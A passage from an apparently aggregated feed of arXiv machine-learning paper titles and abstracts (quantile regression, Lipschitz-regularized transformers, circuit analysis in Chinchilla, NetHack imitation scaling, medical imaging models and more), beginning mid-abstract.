    Linear Regression is a seminal technique in statistics and machine learning, where the objective is to build linear predictive models between a response (i.e., dependent) variable and one or more predictor (i.e., independent) variables. In this paper, we revisit the classical technique of Quantile Regression (QR), which is statistically a more robust alternative to the other classical technique of Ordinary Least Square Regression (OLS). However, while there exist efficient algorithms for OLS, almost all of the known results for QR are only weakly polynomial. Towards filling this gap, this paper proposes several efficient strongly polynomial algorithms for QR for various settings. For two dimensional QR, making a connection to the geometric concept of $k$-set, we propose an algorithm with a deterministic worst-case time complexity of $\mathcal{O}(n^{4/3} polylog(n))$ and an expected time complexity of $\mathcal{O}(n^{4/3})$ for the randomized version. We also propose a randomized divide-and-conquer algorithm -- RandomizedQR with an expected time complexity of $\mathcal{O}(n\log^2{(n)})$ for two dimensional QR problem. For the general case with more than two dimensions, our RandomizedQR algorithm has an expected time complexity of $\mathcal{O}(n^{d-1}\log^2{(n)})$.  ( 2 min )
    Mitigating Transformer Overconfidence via Lipschitz Regularization. (arXiv:2306.06849v2 [cs.LG] UPDATED)
    Though Transformers have achieved promising results in many computer vision tasks, they tend to be over-confident in predictions, as the standard Dot Product Self-Attention (DPSA) can barely preserve distance for the unbounded input domain. In this work, we fill this gap by proposing a novel Lipschitz Regularized Transformer (LRFormer). Specifically, we present a new similarity function with the distance within Banach Space to ensure the Lipschitzness and also regularize the term by a contractive Lipschitz Bound. The proposed method is analyzed with a theoretical guarantee, providing a rigorous basis for its effectiveness and reliability. Extensive experiments conducted on standard vision benchmarks demonstrate that our method outperforms the state-of-the-art single forward pass approaches in prediction, calibration, and uncertainty estimation.
    Continuous-Time Reinforcement Learning: New Design Algorithms with Theoretical Insights and Performance Guarantees. (arXiv:2307.08920v1 [eess.SY])
    Continuous-time nonlinear optimal control problems hold great promise in real-world applications. After decades of development, reinforcement learning (RL) has achieved some of the greatest successes as a general nonlinear control design method. However, a recent comprehensive analysis of state-of-the-art continuous-time RL (CT-RL) methods, namely, adaptive dynamic programming (ADP)-based CT-RL algorithms, reveals they face significant design challenges due to their complexity, numerical conditioning, and dimensional scaling issues. Despite advanced theoretical results, existing ADP CT-RL synthesis methods are inadequate in solving even small, academic problems. The goal of this work is thus to introduce a suite of new CT-RL algorithms for control of affine nonlinear systems. Our design approach relies on two important factors. First, our methods are applicable to physical systems that can be partitioned into smaller subproblems. This constructive consideration results in reduced dimensionality and greatly improved intuitiveness of design. Second, we introduce a new excitation framework to improve persistence of excitation (PE) and numerical conditioning performance via classical input/output insights. Such a design-centric approach is the first of its kind in the ADP CT-RL community. In this paper, we progressively introduce a suite of (decentralized) excitable integral reinforcement learning (EIRL) algorithms. We provide convergence and closed-loop stability guarantees, and we demonstrate these guarantees on a significant application problem of controlling an unstable, nonminimum phase hypersonic vehicle (HSV).
    Outlier-Robust Tensor Low-Rank Representation for Data Clustering. (arXiv:2307.09055v1 [stat.ML])
    Low-rank tensor analysis has received widespread attention with many practical applications. However, the tensor data are often contaminated by outliers or sample-specific corruptions. How to recover the tensor data that are corrupted by outliers and perform data clustering remains a challenging problem. This paper develops an outlier-robust tensor low-rank representation (OR-TLRR) method for simultaneous outlier detection and tensor data clustering based on the tensor singular value decomposition (t-SVD) algebraic framework. It is motivated by the recently proposed tensor-tensor product induced by invertible linear transforms that satisfy certain conditions. For tensor observations with arbitrary outlier corruptions, OR-TLRR has provable performance guarantee for exactly recovering the row space of clean data and detecting outliers under mild conditions. Moreover, an extension of OR-TLRR is also proposed to handle the case when parts of the data are missing. Finally, extensive experimental results on both synthetic and real data demonstrate the effectiveness of the proposed algorithms.
    Continuous Monte Carlo Graph Search. (arXiv:2210.01426v2 [cs.AI] UPDATED)
    In many complex sequential decision-making tasks, online planning is crucial for high performance. For efficient online planning, Monte Carlo Tree Search (MCTS) employs a principled mechanism for trading off exploration for exploitation. MCTS outperforms comparison methods in many discrete decision-making domains such as Go, Chess, and Shogi. Following, extensions of MCTS to continuous domains have been proposed. However, the inherent high branching factor and the resulting explosion of search tree size are limiting existing methods. To address this problem, we propose Continuous Monte Carlo Graph Search (CMCGS), a novel extension of MCTS to online planning in environments with continuous state and action spaces. CMCGS takes advantage of the insight that, during planning, sharing the same action policy between several states can yield high performance. To implement this idea, at each time step, CMCGS clusters similar states into a limited number of stochastic action bandit nodes, which produce a layered directed graph instead of an MCTS search tree. Experimental evaluation shows that CMCGS outperforms comparable planning methods in several complex continuous DeepMind Control Suite benchmarks and a 2D navigation task with limited sample budgets. Furthermore, CMCGS can be parallelized to scale up and it outperforms the Cross-Entropy Method (CEM) in continuous control with learned dynamics models.
    Does Circuit Analysis Interpretability Scale? Evidence from Multiple Choice Capabilities in Chinchilla. (arXiv:2307.09458v1 [cs.LG])
    \emph{Circuit analysis} is a promising technique for understanding the internal mechanisms of language models. However, existing analyses are done in small models far from the state of the art. To address this, we present a case study of circuit analysis in the 70B Chinchilla model, aiming to test the scalability of circuit analysis. In particular, we study multiple-choice question answering, and investigate Chinchilla's capability to identify the correct answer \emph{label} given knowledge of the correct answer \emph{text}. We find that the existing techniques of logit attribution, attention pattern visualization, and activation patching naturally scale to Chinchilla, allowing us to identify and categorize a small set of `output nodes' (attention heads and MLPs). We further study the `correct letter' category of attention heads aiming to understand the semantics of their features, with mixed results. For normal multiple-choice question answers, we significantly compress the query, key and value subspaces of the head without loss of performance when operating on the answer labels for multiple-choice questions, and we show that the query and key subspaces represent an `Nth item in an enumeration' feature to at least some extent. However, when we attempt to use this explanation to understand the heads' behaviour on a more general distribution including randomized answer labels, we find that it is only a partial explanation, suggesting there is more to learn about the operation of `correct letter' heads on multiple choice question answering.
    Discretization-based ensemble model for robust learning in IoT. (arXiv:2307.08955v1 [cs.LG])
    IoT device identification is the process of recognizing and verifying connected IoT devices to the network. This is an essential process for ensuring that only authorized devices can access the network, and it is necessary for network management and maintenance. In recent years, machine learning models have been used widely for automating the process of identifying devices in the network. However, these models are vulnerable to adversarial attacks that can compromise their accuracy and effectiveness. To better secure device identification models, discretization techniques enable reduction in the sensitivity of machine learning models to adversarial attacks contributing to the stability and reliability of the model. On the other hand, Ensemble methods combine multiple heterogeneous models to reduce the impact of remaining noise or errors in the model. Therefore, in this paper, we integrate discretization techniques and ensemble methods and examine it on model robustness against adversarial attacks. In other words, we propose a discretization-based ensemble stacking technique to improve the security of our ML models. We evaluate the performance of different ML-based IoT device identification models against white box and black box attacks using a real-world dataset comprised of network traffic from 28 IoT devices. We demonstrate that the proposed method enables robustness to the models for IoT device identification.
    Neural Network Pruning as Spectrum Preserving Process. (arXiv:2307.08982v1 [cs.LG])
    Neural networks have achieved remarkable performance in various application domains. Nevertheless, a large number of weights in pre-trained deep neural networks prohibit them from being deployed on smartphones and embedded systems. It is highly desirable to obtain lightweight versions of neural networks for inference in edge devices. Many cost-effective approaches were proposed to prune dense and convolutional layers that are common in deep neural networks and dominant in the parameter space. However, a unified theoretical foundation for the problem mostly is missing. In this paper, we identify the close connection between matrix spectrum learning and neural network training for dense and convolutional layers and argue that weight pruning is essentially a matrix sparsification process to preserve the spectrum. Based on the analysis, we also propose a matrix sparsification algorithm tailored for neural network pruning that yields better pruning result. We carefully design and conduct experiments to support our arguments. Hence we provide a consolidated viewpoint for neural network pruning and enhance the interpretability of deep neural networks by identifying and preserving the critical neural weights.
    CB-HVTNet: A channel-boosted hybrid vision transformer network for lymphocyte assessment in histopathological images. (arXiv:2305.09211v2 [eess.IV] UPDATED)
    Transformers, due to their ability to learn long range dependencies, have overcome the shortcomings of convolutional neural networks (CNNs) for global perspective learning. Therefore, they have gained the focus of researchers for several vision related tasks including medical diagnosis. However, their multi-head attention module only captures global level feature representations, which is insufficient for medical images. To address this issue, we propose a Channel Boosted Hybrid Vision Transformer (CB HVT) that uses transfer learning to generate boosted channels and employs both transformers and CNNs to analyse lymphocytes in histopathological images. The proposed CB HVT comprises five modules, including a channel generation module, channel exploitation module, channel merging module, region-aware module, and a detection and segmentation head, which work together to effectively identify lymphocytes. The channel generation module uses the idea of channel boosting through transfer learning to extract diverse channels from different auxiliary learners. In the CB HVT, these boosted channels are first concatenated and ranked using an attention mechanism in the channel exploitation module. A fusion block is then utilized in the channel merging module for a gradual and systematic merging of the diverse boosted channels to improve the network's learning representations. The CB HVT also employs a proposal network in its region aware module and a head to effectively identify objects, even in overlapping regions and with artifacts. We evaluated the proposed CB HVT on two publicly available datasets for lymphocyte assessment in histopathological images. The results show that CB HVT outperformed other state of the art detection models, and has good generalization ability, demonstrating its value as a tool for pathologists.
    Intuitionistic Fuzzy Broad Learning System: Enhancing Robustness Against Noise and Outliers. (arXiv:2307.08713v1 [cs.LG])
    In the realm of data classification, broad learning system (BLS) has proven to be a potent tool that utilizes a layer-by-layer feed-forward neural network. It consists of feature learning and enhancement segments, working together to extract intricate features from input data. The traditional BLS treats all samples as equally significant, which makes it less robust and less effective for real-world datasets with noises and outliers. To address this issue, we propose the fuzzy BLS (F-BLS) model, which assigns a fuzzy membership value to each training point to reduce the influence of noises and outliers. In assigning the membership value, the F-BLS model solely considers the distance from samples to the class center in the original feature space without incorporating the extent of non-belongingness to a class. We further propose a novel BLS based on intuitionistic fuzzy theory (IF-BLS). The proposed IF-BLS utilizes intuitionistic fuzzy numbers based on fuzzy membership and non-membership values to assign scores to training points in the high-dimensional feature space by using a kernel function. We evaluate the performance of proposed F-BLS and IF-BLS models on 44 UCI benchmark datasets across diverse domains. Furthermore, Gaussian noise is added to some UCI datasets to assess the robustness of the proposed F-BLS and IF-BLS models. Experimental results demonstrate superior generalization performance of the proposed F-BLS and IF-BLS models compared to baseline models, both with and without Gaussian noise. Additionally, we implement the proposed F-BLS and IF-BLS models on the Alzheimers Disease Neuroimaging Initiative (ADNI) dataset, and promising results showcase the models effectiveness in real-world applications. The proposed methods offer a promising solution to enhance the BLS frameworks ability to handle noise and outliers.
    MVA2023 Small Object Detection Challenge for Spotting Birds: Dataset, Methods, and Results. (arXiv:2307.09143v1 [cs.CV])
    Small Object Detection (SOD) is an important machine vision topic because (i) a variety of real-world applications require object detection for distant objects and (ii) SOD is a challenging task due to the noisy, blurred, and less-informative image appearances of small objects. This paper proposes a new SOD dataset consisting of 39,070 images including 137,121 bird instances, which is called the Small Object Detection for Spotting Birds (SOD4SB) dataset. The detail of the challenge with the SOD4SB dataset is introduced in this paper. In total, 223 participants joined this challenge. This paper briefly introduces the award-winning methods. The dataset, the baseline code, and the website for evaluation on the public testset are publicly available.
    The Score-Difference Flow for Implicit Generative Modeling. (arXiv:2304.12906v2 [cs.LG] UPDATED)
    Implicit generative modeling (IGM) aims to produce samples of synthetic data matching the characteristics of a target data distribution. Recent work (e.g. score-matching networks, diffusion models) has approached the IGM problem from the perspective of pushing synthetic source data toward the target distribution via dynamical perturbations or flows in the ambient space. In this direction, we present the score difference (SD) between arbitrary target and source distributions as a flow that optimally reduces the Kullback-Leibler divergence between them while also solving the Schroedinger bridge problem. We apply the SD flow to convenient proxy distributions, which are aligned if and only if the original distributions are aligned. We demonstrate the formal equivalence of this formulation to denoising diffusion models under certain conditions. We also show that the training of generative adversarial networks includes a hidden data-optimization sub-problem, which induces the SD flow under certain choices of loss function when the discriminator is optimal. As a result, the SD flow provides a theoretical link between model classes that individually address the three challenges of the "generative modeling trilemma" -- high sample quality, mode coverage, and fast sampling -- thereby setting the stage for a unified approach.
    Meta-Polyp: a baseline for efficient Polyp segmentation. (arXiv:2305.07848v3 [eess.IV] UPDATED)
    In recent years, polyp segmentation has gained significant importance, and many methods have been developed using CNN, Vision Transformer, and Transformer techniques to achieve competitive results. However, these methods often face difficulties when dealing with out-of-distribution datasets, missing boundaries, and small polyps. In 2022, Meta-Former was introduced as a new baseline for vision, which not only improved the performance of multi-task computer vision but also addressed the limitations of the Vision Transformer and CNN family backbones. To further enhance segmentation, we propose a fusion of Meta-Former with UNet, along with the introduction of a Multi-scale Upsampling block with a level-up combination in the decoder stage to enhance the texture, also we propose the Convformer block base on the idea of the Meta-former to enhance the crucial information of the local feature. These blocks enable the combination of global information, such as the overall shape of the polyp, with local information and boundary information, which is crucial for the decision of the medical segmentation. Our proposed approach achieved competitive performance and obtained the top result in the State of the Art on the CVC-300 dataset, Kvasir, and CVC-ColonDB dataset. Apart from Kvasir-SEG, others are out-of-distribution datasets. The implementation can be found at: https://github.com/huyquoctrinh/MetaPolyp-CBMS2023.
    Efficient Prediction of Peptide Self-assembly through Sequential and Graphical Encoding. (arXiv:2307.09169v1 [q-bio.BM])
    In recent years, there has been an explosion of research on the application of deep learning to the prediction of various peptide properties, due to the significant development and market potential of peptides. Molecular dynamics has enabled the efficient collection of large peptide datasets, providing reliable training data for deep learning. However, the lack of systematic analysis of the peptide encoding, which is essential for AI-assisted peptide-related tasks, makes it an urgent problem to be solved for the improvement of prediction accuracy. To address this issue, we first collect a high-quality, colossal simulation dataset of peptide self-assembly containing over 62,000 samples generated by coarse-grained molecular dynamics (CGMD). Then, we systematically investigate the effect of peptide encoding of amino acids into sequences and molecular graphs using state-of-the-art sequential (i.e., RNN, LSTM, and Transformer) and structural deep learning models (i.e., GCN, GAT, and GraphSAGE), on the accuracy of peptide self-assembly prediction, an essential physiochemical process prior to any peptide-related applications. Extensive benchmarking studies have proven Transformer to be the most powerful sequence-encoding-based deep learning model, pushing the limit of peptide self-assembly prediction to decapeptides. In summary, this work provides a comprehensive benchmark analysis of peptide encoding with advanced deep learning models, serving as a guide for a wide range of peptide-related predictions such as isoelectric points, hydration free energy, etc.
    Exploiting Field Dependencies for Learning on Categorical Data. (arXiv:2307.09321v1 [cs.LG])
    Traditional approaches for learning on categorical data underexploit the dependencies between columns (\aka fields) in a dataset because they rely on the embedding of data points driven alone by the classification/regression loss. In contrast, we propose a novel method for learning on categorical data with the goal of exploiting dependencies between fields. Instead of modelling statistics of features globally (i.e., by the covariance matrix of features), we learn a global field dependency matrix that captures dependencies between fields and then we refine the global field dependency matrix at the instance-wise level with different weights (so-called local dependency modelling) w.r.t. each field to improve the modelling of the field dependencies. Our algorithm exploits the meta-learning paradigm, i.e., the dependency matrices are refined in the inner loop of the meta-learning algorithm without the use of labels, whereas the outer loop intertwines the updates of the embedding matrix (the matrix performing projection) and global dependency matrix in a supervised fashion (with the use of labels). Our method is simple yet it outperforms several state-of-the-art methods on six popular dataset benchmarks. Detailed ablation studies provide additional insights into our method.
    Unsupervised Embedding Quality Evaluation. (arXiv:2305.16562v2 [cs.LG] UPDATED)
    Unsupervised learning has recently significantly gained in popularity, especially with deep learning-based approaches. Despite numerous successes and approaching supervised-level performance on a variety of academic benchmarks, it is still hard to train and evaluate SSL models in practice due to the unsupervised nature of the problem. Even with networks trained in a supervised fashion, it is often unclear whether they will perform well when transferred to another domain. Past works are generally limited to assessing the amount of information contained in embeddings, which is most relevant for self-supervised learning of deep neural networks. This works chooses to follow a different approach: can we quantify how easy it is to linearly separate the data in a stable way? We survey the literature and uncover three methods that could be potentially used for evaluating quality of representations. We also introduce one novel method based on recent advances in understanding the high-dimensional geometric structure of self-supervised learning. We conduct extensive experiments and study the properties of these metrics and ones introduced in the previous work. Our results suggest that while there is no free lunch, there are metrics that can robustly estimate embedding quality in an unsupervised way.
    End-to-End Neural Network Training for Hyperbox-Based Classification. (arXiv:2307.09269v1 [cs.LG])
    Hyperbox-based classification has been seen as a promising technique in which decisions on the data are represented as a series of orthogonal, multidimensional boxes (i.e., hyperboxes) that are often interpretable and human-readable. However, existing methods are no longer capable of efficiently handling the increasing volume of data many application domains face nowadays. We address this gap by proposing a novel, fully differentiable framework for hyperbox-based classification via neural networks. In contrast to previous work, our hyperbox models can be efficiently trained in an end-to-end fashion, which leads to significantly reduced training times and superior classification results.
    A Cryogenic Memristive Neural Decoder for Fault-tolerant Quantum Error Correction. (arXiv:2307.09463v1 [quant-ph])
    Neural decoders for quantum error correction (QEC) rely on neural networks to classify syndromes extracted from error correction codes and find appropriate recovery operators to protect logical information against errors. Despite the good performance of neural decoders, important practical requirements remain to be achieved, such as minimizing the decoding time to meet typical rates of syndrome generation in repeated error correction schemes, and ensuring the scalability of the decoding approach as the code distance increases. Designing a dedicated integrated circuit to perform the decoding task in co-integration with a quantum processor appears necessary to reach these decoding time and scalability requirements, as routing signals in and out of a cryogenic environment to be processed externally leads to unnecessary delays and an eventual wiring bottleneck. In this work, we report the design and performance analysis of a neural decoder inference accelerator based on an in-memory computing (IMC) architecture, where crossbar arrays of resistive memory devices are employed to both store the synaptic weights of the decoder neural network and perform analog matrix-vector multiplications during inference. In proof-of-concept numerical experiments supported by experimental measurements, we investigate the impact of TiO$_\textrm{x}$-based memristive devices' non-idealities on decoding accuracy. Hardware-aware training methods are developed to mitigate the loss in accuracy, allowing the memristive neural decoders to achieve a pseudo-threshold of $9.23\times 10^{-4}$ for the distance-three surface code, whereas the equivalent digital neural decoder achieves a pseudo-threshold of $1.01\times 10^{-3}$. This work provides a pathway to scalable, fast, and low-power cryogenic IMC hardware for integrated QEC.
    Heat Demand Forecasting with Multi-Resolutional Representation of Heterogeneous Temporal Ensemble. (arXiv:2210.13108v2 [cs.LG] UPDATED)
    One of the primal challenges faced by utility companies is ensuring efficient supply with minimal greenhouse gas emissions. The advent of smart meters and smart grids provide an unprecedented advantage in realizing an optimised supply of thermal energies through proactive techniques such as load forecasting. In this paper, we propose a forecasting framework for heat demand based on neural networks where the time series are encoded as scalograms equipped with the capacity of embedding exogenous variables such as weather, and holiday/non-holiday. Subsequently, CNNs are utilized to predict the heat load multi-step ahead. Finally, the proposed framework is compared with other state-of-the-art methods, such as SARIMAX and LSTM. The quantitative results from retrospective experiments show that the proposed framework consistently outperforms the state-of-the-art baseline method with real-world data acquired from Denmark. A minimal mean error of 7.54% for MAPE and 417kW for RMSE is achieved with the proposed framework in comparison to all other methods.
    MOCA: Self-supervised Representation Learning by Predicting Masked Online Codebook Assignments. (arXiv:2307.09361v1 [cs.CV])
    Self-supervised learning can be used for mitigating the greedy needs of Vision Transformer networks for very large fully-annotated datasets. Different classes of self-supervised learning offer representations with either good contextual reasoning properties, e.g., using masked image modeling strategies, or invariance to image perturbations, e.g., with contrastive methods. In this work, we propose a single-stage and standalone method, MOCA, which unifies both desired properties using novel mask-and-predict objectives defined with high-level features (instead of pixel-level details). Moreover, we show how to effectively employ both learning paradigms in a synergistic and computation-efficient way. Doing so, we achieve new state-of-the-art results on low-shot settings and strong experimental results in various evaluation protocols with a training that is at least 3 times faster than prior methods.
    Exploiting Noise as a Resource for Computation and Learning in Spiking Neural Networks. (arXiv:2305.16044v5 [cs.NE] UPDATED)
    Networks of spiking neurons underpin the extraordinary information-processing capabilities of the brain and have become pillar models in neuromorphic artificial intelligence. Despite extensive research on spiking neural networks (SNNs), most studies are established on deterministic models, overlooking the inherent non-deterministic, noisy nature of neural computations. This study introduces the noisy spiking neural network (NSNN) and the noise-driven learning rule (NDL) by incorporating noisy neuronal dynamics to exploit the computational advantages of noisy neural processing. NSNN provides a theoretical framework that yields scalable, flexible, and reliable computation. We demonstrate that NSNN leads to spiking neural models with competitive performance, improved robustness against challenging perturbations than deterministic SNNs, and better reproducing probabilistic neural computation in neural coding. This study offers a powerful and easy-to-use tool for machine learning, neuromorphic intelligence practitioners, and computational neuroscience researchers.
    Towards Ordinal Data Science. (arXiv:2307.09477v1 [cs.AI])
    Order is one of the main instruments to measure the relationship between objects in (empirical) data. However, compared to methods that use numerical properties of objects, the amount of ordinal methods developed is rather small. One reason for this is the limited availability of computational resources in the last century that would have been required for ordinal computations. Another reason -- particularly important for this line of research -- is that order-based methods are often seen as too mathematically rigorous for applying them to real-world data. In this paper, we will therefore discuss different means for measuring and 'calculating' with ordinal structures -- a specific class of directed graphs -- and show how to infer knowledge from them. Our aim is to establish Ordinal Data Science as a fundamentally new research agenda. Besides cross-fertilization with other cornerstone machine learning and knowledge representation methods, a broad range of disciplines will benefit from this endeavor, including, psychology, sociology, economics, web science, knowledge engineering, scientometrics.
    Smooth Attention for Deep Multiple Instance Learning: Application to CT Intracranial Hemorrhage Detection. (arXiv:2307.09457v1 [eess.IV])
    Multiple Instance Learning (MIL) has been widely applied to medical imaging diagnosis, where bag labels are known and instance labels inside bags are unknown. Traditional MIL assumes that instances in each bag are independent samples from a given distribution. However, instances are often spatially or sequentially ordered, and one would expect similar diagnostic importance for neighboring instances. To address this, in this study, we propose a smooth attention deep MIL (SA-DMIL) model. Smoothness is achieved by the introduction of first and second order constraints on the latent function encoding the attention paid to each instance in a bag. The method is applied to the detection of intracranial hemorrhage (ICH) on head CT scans. The results show that this novel SA-DMIL: (a) achieves better performance than the non-smooth attention MIL at both scan (bag) and slice (instance) levels; (b) learns spatial dependencies between slices; and (c) outperforms current state-of-the-art MIL methods on the same ICH test set.
    SLCA: Slow Learner with Classifier Alignment for Continual Learning on a Pre-trained Model. (arXiv:2303.05118v2 [cs.CV] UPDATED)
    The goal of continual learning is to improve the performance of recognition models in learning sequentially arrived data. Although most existing works are established on the premise of learning from scratch, growing efforts have been devoted to incorporating the benefits of pre-training. However, how to adaptively exploit the pre-trained knowledge for each incremental task while maintaining its generalizability remains an open question. In this work, we present an extensive analysis for continual learning on a pre-trained model (CLPM), and attribute the key challenge to a progressive overfitting problem. Observing that selectively reducing the learning rate can almost resolve this issue in the representation layer, we propose a simple but extremely effective approach named Slow Learner with Classifier Alignment (SLCA), which further improves the classification layer by modeling the class-wise distributions and aligning the classification layers in a post-hoc fashion. Across a variety of scenarios, our proposal provides substantial improvements for CLPM (e.g., up to 49.76%, 50.05%, 44.69% and 40.16% on Split CIFAR-100, Split ImageNet-R, Split CUB-200 and Split Cars-196, respectively), and thus outperforms state-of-the-art approaches by a large margin. Based on such a strong baseline, critical factors and promising directions are analyzed in-depth to facilitate subsequent research.
    Deep Riemannian Networks for EEG Decoding. (arXiv:2212.10426v5 [cs.LG] UPDATED)
    State-of-the-art performance in electroencephalography (EEG) decoding tasks is currently often achieved with either Deep-Learning (DL) or Riemannian-Geometry-based decoders (RBDs). Recently, there is growing interest in Deep Riemannian Networks (DRNs) possibly combining the advantages of both previous classes of methods. However, there are still a range of topics where additional insight is needed to pave the way for a more widespread application of DRNs in EEG. These include architecture design questions such as network size and end-to-end ability.How these factors affect model performance has not been explored. Additionally, it is not clear how the data within these networks is transformed, and whether this would correlate with traditional EEG decoding. Our study aims to lay the groundwork in the area of these topics through the analysis of DRNs for EEG with a wide range of hyperparameters. Networks were tested on two public EEG datasets and compared with state-of-the-art ConvNets. Here we propose end-to-end EEG SPDNet (EE(G)-SPDNet), and we show that this wide, end-to-end DRN can outperform the ConvNets, and in doing so use physiologically plausible frequency regions. We also show that the end-to-end approach learns more complex filters than traditional band-pass filters targeting the classical alpha, beta, and gamma frequency bands of the EEG, and that performance can benefit from channel specific filtering approaches. Additionally, architectural analysis revealed areas for further improvement due to the possible loss of Riemannian specific information throughout the network. Our study thus shows how to design and train DRNs to infer task-related information from the raw EEG without the need of handcrafted filterbanks and highlights the potential of end-to-end DRNs such as EE(G)-SPDNet for high-performance EEG decoding.
    Scaling Laws for Imitation Learning in NetHack. (arXiv:2307.09423v1 [cs.LG])
    Imitation Learning (IL) is one of the most widely used methods in machine learning. Yet, while powerful, many works find it is often not able to fully recover the underlying expert behavior. However, none of these works deeply investigate the role of scaling up the model and data size. Inspired by recent work in Natural Language Processing (NLP) where "scaling up" has resulted in increasingly more capable LLMs, we investigate whether carefully scaling up model and data size can bring similar improvements in the imitation learning setting. To demonstrate our findings, we focus on the game of NetHack, a challenging environment featuring procedural generation, stochasticity, long-term dependencies, and partial observability. We find IL loss and mean return scale smoothly with the compute budget and are strongly correlated, resulting in power laws for training compute-optimal IL agents with respect to model size and number of samples. We forecast and train several NetHack agents with IL and find they outperform prior state-of-the-art by at least 2x in all settings. Our work both demonstrates the scaling behavior of imitation learning in a challenging domain, as well as the viability of scaling up current approaches for increasingly capable agents in NetHack, a game that remains elusively hard for current AI systems.
    Detecting Throat Cancer from Speech Signals Using Machine Learning: A Reproducible Literature Review. (arXiv:2307.09230v1 [cs.LG])
    In this work we perform a scoping review of the current literature on the detection of throat cancer from speech recordings using machine learning and artificial intelligence. We find 22 papers within this area and discuss their methods and results. We split these papers into two groups - nine performing binary classification, and 13 performing multi-class classification. The papers present a range of methods with neural networks being most commonly implemented. Many features are also extracted from the audio before classification, with the most common bring mel-frequency cepstral coefficients. None of the papers found in this search have associated code repositories and as such are not reproducible. Therefore, we create a publicly available code repository of our own classifiers. We use transfer learning on a multi-class problem, classifying three pathologies and healthy controls. Using this technique we achieve an unweighted average recall of 53.54%, sensitivity of 83.14%, and specificity of 64.00%. We compare our classifiers with the results obtained on the same dataset and find similar results.
    PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models. (arXiv:2307.09254v1 [cs.LG])
    Uncertainty learning and quantification of models are crucial tasks to enhance the trustworthiness of the models. Importantly, the recent surge of generative language models (GLMs) emphasizes the need for reliable uncertainty quantification due to the concerns on generating hallucinated facts. In this paper, we propose to learn neural prediction set models that comes with the probably approximately correct (PAC) guarantee for quantifying the uncertainty of GLMs. Unlike existing prediction set models, which are parameterized by a scalar value, we propose to parameterize prediction sets via neural networks, which achieves more precise uncertainty quantification but still satisfies the PAC guarantee. We demonstrate the efficacy of our method on four types of language datasets and six types of models by showing that our method improves the quantified uncertainty by $63\%$ on average, compared to a standard baseline method.
    SparseOptimizer: Sparsify Language Models through Moreau-Yosida Regularization and Accelerate via Compiler Co-design. (arXiv:2306.15656v3 [cs.LG] UPDATED)
    This paper introduces SparseOptimizer, a novel deep learning optimizer that exploits Moreau-Yosida regularization to naturally induce sparsity in large language models such as BERT, ALBERT and GPT. Key to the design of SparseOptimizer is an embedded shrinkage operator, which imparts sparsity directly within the optimization process. This operator, backed by a sound theoretical framework, includes an analytical solution, thereby reinforcing the optimizer's robustness and efficacy. Crucially, SparseOptimizer's plug-and-play functionality eradicates the need for code modifications, making it a universally adaptable tool for a wide array of large language models. Empirical evaluations on benchmark datasets such as GLUE, RACE, SQuAD1, and SQuAD2 confirm that SparseBERT and SparseALBERT, when sparsified using SparseOptimizer, achieve performance comparable to their dense counterparts, BERT and ALBERT, while significantly reducing their parameter count. Further, this work proposes an innovative optimizer-compiler co-design strategy, demonstrating the potential of inference acceleration (\textbf{3.37x}, \textbf{6.30x}, and \textbf{7.15x} in comparison with Pytorch, TensorFlow, and LLVM generic compile, respectively) in SparseBERT when paired with an appropriately designed compiler. This study represents a significant step forward in the evolution of efficient, scalable, and high-performing large language models, setting a precedent for future exploration and optimization in this domain. The SparseOptimizer code and SparseALBERT model will be publicly available upon paper acceptance.
    Multi-Objective GFlowNets. (arXiv:2210.12765v2 [cs.LG] UPDATED)
    We study the problem of generating diverse candidates in the context of Multi-Objective Optimization. In many applications of machine learning such as drug discovery and material design, the goal is to generate candidates which simultaneously optimize a set of potentially conflicting objectives. Moreover, these objectives are often imperfect evaluations of some underlying property of interest, making it important to generate diverse candidates to have multiple options for expensive downstream evaluations. We propose Multi-Objective GFlowNets (MOGFNs), a novel method for generating diverse Pareto optimal solutions, based on GFlowNets. We introduce two variants of MOGFNs: MOGFN-PC, which models a family of independent sub-problems defined by a scalarization function, with reward-conditional GFlowNets, and MOGFN-AL, which solves a sequence of sub-problems defined by an acquisition function in an active learning loop. Our experiments on wide variety of synthetic and benchmark tasks demonstrate advantages of the proposed methods in terms of the Pareto performance and importantly, improved candidate diversity, which is the main contribution of this work.
    Do DL models and training environments have an impact on energy consumption?. (arXiv:2307.05520v2 [cs.LG] UPDATED)
    Current research in the computer vision field mainly focuses on improving Deep Learning (DL) correctness and inference time performance. However, there is still little work on the huge carbon footprint that has training DL models. This study aims to analyze the impact of the model architecture and training environment when training greener computer vision models. We divide this goal into two research questions. First, we analyze the effects of model architecture on achieving greener models while keeping correctness at optimal levels. Second, we study the influence of the training environment on producing greener models. To investigate these relationships, we collect multiple metrics related to energy efficiency and model correctness during the models' training. Then, we outline the trade-offs between the measured energy efficiency and the models' correctness regarding model architecture, and their relationship with the training environment. We conduct this research in the context of a computer vision system for image classification. In conclusion, we show that selecting the proper model architecture and training environment can reduce energy consumption dramatically (up to 98.83%) at the cost of negligible decreases in correctness. Also, we find evidence that GPUs should scale with the models' computational complexity for better energy efficiency.
    Fusing Hand and Body Skeletons for Human Action Recognition in Assembly. (arXiv:2307.09238v1 [cs.CV])
    As collaborative robots (cobots) continue to gain popularity in industrial manufacturing, effective human-robot collaboration becomes crucial. Cobots should be able to recognize human actions to assist with assembly tasks and act autonomously. To achieve this, skeleton-based approaches are often used due to their ability to generalize across various people and environments. Although body skeleton approaches are widely used for action recognition, they may not be accurate enough for assembly actions where the worker's fingers and hands play a significant role. To address this limitation, we propose a method in which less detailed body skeletons are combined with highly detailed hand skeletons. We investigate CNNs and transformers, the latter of which are particularly adept at extracting and combining important information from both skeleton types using attention. This paper demonstrates the effectiveness of our proposed approach in enhancing action recognition in assembly scenarios.
    Revisiting the Robustness of the Minimum Error Entropy Criterion: A Transfer Learning Case Study. (arXiv:2307.08572v2 [cs.LG] UPDATED)
    Coping with distributional shifts is an important part of transfer learning methods in order to perform well in real-life tasks. However, most of the existing approaches in this area either focus on an ideal scenario in which the data does not contain noises or employ a complicated training paradigm or model design to deal with distributional shifts. In this paper, we revisit the robustness of the minimum error entropy (MEE) criterion, a widely used objective in statistical signal processing to deal with non-Gaussian noises, and investigate its feasibility and usefulness in real-life transfer learning regression tasks, where distributional shifts are common. Specifically, we put forward a new theoretical result showing the robustness of MEE against covariate shift. We also show that by simply replacing the mean squared error (MSE) loss with the MEE on basic transfer learning algorithms such as fine-tuning and linear probing, we can achieve competitive performance with respect to state-of-the-art transfer learning algorithms. We justify our arguments on both synthetic data and 5 real-world time-series data.
